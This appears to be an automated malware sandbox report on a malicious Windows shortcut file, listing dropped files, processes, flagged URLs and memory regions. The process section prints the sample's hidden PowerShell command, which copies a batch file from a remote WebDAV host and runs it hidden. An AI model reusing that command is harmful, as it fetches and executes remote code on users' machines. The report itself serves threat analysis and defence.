IOC Report
dial2%20(2).Ink.lnk

loading gif

Files

File Path
Type
Category
Malicious
dial2%20(2).Ink.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Fri Feb 2 17:37:06 2018, mtime=Fri Feb 2 17:37:12 2018, atime=Fri Feb 2 17:37:06 2018, length=446976, window=hidenormalshowminimized
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3nwmizi4.mvm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npbnqcxg.prb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\06VFN979D6F9VAOAY7LF.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\1c9a6b6d5b9db7b.customDesusertions-ms (copy)
data
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://pizza-practices-representative-country.trycloudflare.com
unknown
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://pizza-practices-representative-country.trycloudflare.com.Z2
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://oneget.orgX
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
https://oneget.org
unknown
There are 5 hidden URLs, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7FF88831C000
trusted library allocation
page execute and read and write
22017490000
heap
page execute and read and write
2202F7F9000
heap
page read and write
7FF8882C2000
trusted library allocation
page read and write
2201753B000
trusted library allocation
page read and write
22017210000
trusted library allocation
page read and write
7FF888370000
trusted library allocation
page read and write
22019013000
trusted library allocation
page read and write
2202F545000
heap
page read and write
7FF8885C0000
trusted library allocation
page read and write
7FF8883A6000
trusted library allocation
page execute and read and write
C07C639000
stack
page read and write
22015561000
heap
page read and write
7FF8884B0000
trusted library allocation
page execute and read and write
C07C0FE000
stack
page read and write
C07C3FE000
stack
page read and write
2202F760000
heap
page read and write
7FF888460000
trusted library allocation
page read and write
22015440000
heap
page read and write
7FF8884C0000
trusted library allocation
page read and write
22015400000
heap
page read and write
7FF888500000
trusted library allocation
page read and write
2202F4CC000
heap
page read and write
7FF88847A000
trusted library allocation
page read and write
7FF8885E0000
trusted library allocation
page read and write
7FF8882DB000
trusted library allocation
page read and write
7FF888590000
trusted library allocation
page read and write
22015780000
heap
page read and write
2202F4B0000
heap
page read and write
22018CEC000
trusted library allocation
page read and write
2202F630000
heap
page execute and read and write
220274C0000
trusted library allocation
page read and write
220174B1000
trusted library allocation
page read and write
22018CE4000
trusted library allocation
page read and write
C07C7BE000
stack
page read and write
220180E2000
trusted library allocation
page read and write
7FF8884A2000
trusted library allocation
page read and write
22017250000
heap
page readonly
22016EA5000
heap
page read and write
2202F51D000
heap
page read and write
2202F58F000
heap
page read and write
2202751E000
trusted library allocation
page read and write
7FF888560000
trusted library allocation
page read and write
22017497000
heap
page execute and read and write
C07C076000
stack
page read and write
C07C6B8000
stack
page read and write
220155AA000
heap
page read and write
C07C1FD000
stack
page read and write
C07C47D000
stack
page read and write
7FF888520000
trusted library allocation
page read and write
C07C27E000
stack
page read and write
C07C8BE000
stack
page read and write
220172D0000
heap
page read and write
C07C37E000
stack
page read and write
220155B0000
heap
page read and write
22027661000
trusted library allocation
page read and write
2201862F000
trusted library allocation
page read and write
22018D56000
trusted library allocation
page read and write
220154D8000
heap
page read and write
C07C53E000
stack
page read and write
2202F680000
heap
page read and write
22018CEA000
trusted library allocation
page read and write
22017240000
trusted library allocation
page read and write
C07D30F000
stack
page read and write
7FF888480000
trusted library allocation
page execute and read and write
7FF8882E0000
trusted library allocation
page read and write
22015509000
heap
page read and write
7FF8885B0000
trusted library allocation
page read and write
7FF888550000
trusted library allocation
page read and write
7FF8884D0000
trusted library allocation
page read and write
7FF888570000
trusted library allocation
page read and write
7FF88837C000
trusted library allocation
page execute and read and write
C07C4F9000
stack
page read and write
22015785000
heap
page read and write
2202F76C000
heap
page read and write
C07C93B000
stack
page read and write
22016EA0000
heap
page read and write
2202F51A000
heap
page read and write
7FF888600000
trusted library allocation
page read and write
220153E0000
heap
page read and write
7FF8882D0000
trusted library allocation
page read and write
22017293000
trusted library allocation
page read and write
2202F660000
heap
page read and write
2201553E000
heap
page read and write
2202F7FC000
heap
page read and write
220172E3000
heap
page read and write
2202F547000
heap
page read and write
C07C17E000
stack
page read and write
7FF8885D0000
trusted library allocation
page read and write
220274B1000
trusted library allocation
page read and write
C07C73E000
stack
page read and write
7DF46BAA0000
trusted library allocation
page execute and read and write
22015583000
heap
page read and write
2202F550000
heap
page read and write
2202F778000
heap
page read and write
220154D0000
heap
page read and write
7FF888490000
trusted library allocation
page execute and read and write
7FF888610000
trusted library allocation
page read and write
2202F7F4000
heap
page read and write
7FF888380000
trusted library allocation
page execute and read and write
22015565000
heap
page read and write
7FF8884F0000
trusted library allocation
page read and write
220154E2000
heap
page read and write
7FF8883E0000
trusted library allocation
page execute and read and write
22017290000
trusted library allocation
page read and write
C07C5B7000
stack
page read and write
7FF8882C3000
trusted library allocation
page execute and read and write
7FF888376000
trusted library allocation
page read and write
C07C2FB000
stack
page read and write
220176E2000
trusted library allocation
page read and write
7FF8882CD000
trusted library allocation
page execute and read and write
7FF888471000
trusted library allocation
page read and write
7FF8882C4000
trusted library allocation
page read and write
7FF8885A0000
trusted library allocation
page read and write
7FF888510000
trusted library allocation
page read and write
22015571000
heap
page read and write
7FF888580000
trusted library allocation
page read and write
22018D35000
trusted library allocation
page read and write
22018D92000
trusted library allocation
page read and write
22016E90000
heap
page read and write
C07C5BE000
stack
page read and write
220174A0000
heap
page execute and read and write
7FF888530000
trusted library allocation
page read and write
22015300000
heap
page read and write
220173F0000
trusted library allocation
page read and write
7FF888540000
trusted library allocation
page read and write
2202F7A2000
heap
page read and write
220190DD000
trusted library allocation
page read and write
2202F7A5000
heap
page read and write
220190D8000
trusted library allocation
page read and write
7FF8884E0000
trusted library allocation
page read and write
7FF8885F0000
trusted library allocation
page read and write
22018D0A000
trusted library allocation
page read and write
There are 123 hidden memdumps, click here to show them.